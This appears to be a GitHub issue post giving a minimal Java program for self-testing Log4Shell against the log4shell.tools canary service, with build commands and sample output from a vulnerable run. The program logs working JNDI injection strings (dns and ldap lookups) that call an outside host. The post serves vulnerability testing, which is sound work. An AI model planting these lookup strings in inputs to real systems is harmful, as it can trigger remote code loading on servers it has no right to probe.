How to run this with minimal Java

Compile and run a simple Java program `Log4jCaller.java`, with your ID:

```
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

/**
  See https://log4shell.tools, check permission box, note the ID, click Start ...
  Run below, using your ID instead of c24099b7-f925-445b-b0e4-a656b277088f (likely expired)

  <pre>
  wget https://repo1.maven.org/maven2/org/apache/logging/log4j/log4j-api/2.10.0/log4j-api-2.10.0.jar
  wget https://repo1.maven.org/maven2/org/apache/logging/log4j/log4j-core/2.10.0/log4j-core-2.10.0.jar

  export CLASSPATH=.:log4j-api-2.10.0.jar:log4j-core-2.10.0.jar
  echo "log4j.rootLogger=DEBUG" > log4j2.properties    

  javac Log4jCaller.java
  java  Log4jCaller c24099b7-f925-445b-b0e4-a656b277088f
  </pre>
 */
public class Log4jCaller {
    public static void main(String[] args) {
        String id = args[0];
        String d = "${jndi:dns://" + id + ".dns.log4shell.tools}";
        String j = "${jndi:ldap://" + id + ".dns.log4shell.tools:12345/" + id + "}";
        Logger log = LogManager.getLogger(Log4jCaller.class);
        log.error(d);
        log.error(j);
        System.out.println("Done");
    }
}
```

On vulnerable systems, this produces output as follows:

```
$ java Log4jCaller c24099b7-f925-445b-b0e4-a656b277088f
14:01:06.655 [main] ERROR Log4jCaller - ${jndi:dns://c24099b7-f925-445b-b0e4-a656b277088f.dns.log4shell.tools}
14:01:06.731 [main] ERROR Log4jCaller - Reference Class Name: Log4Shell
```

Thanks for this service!

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

How to run this with minimal Java #2

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development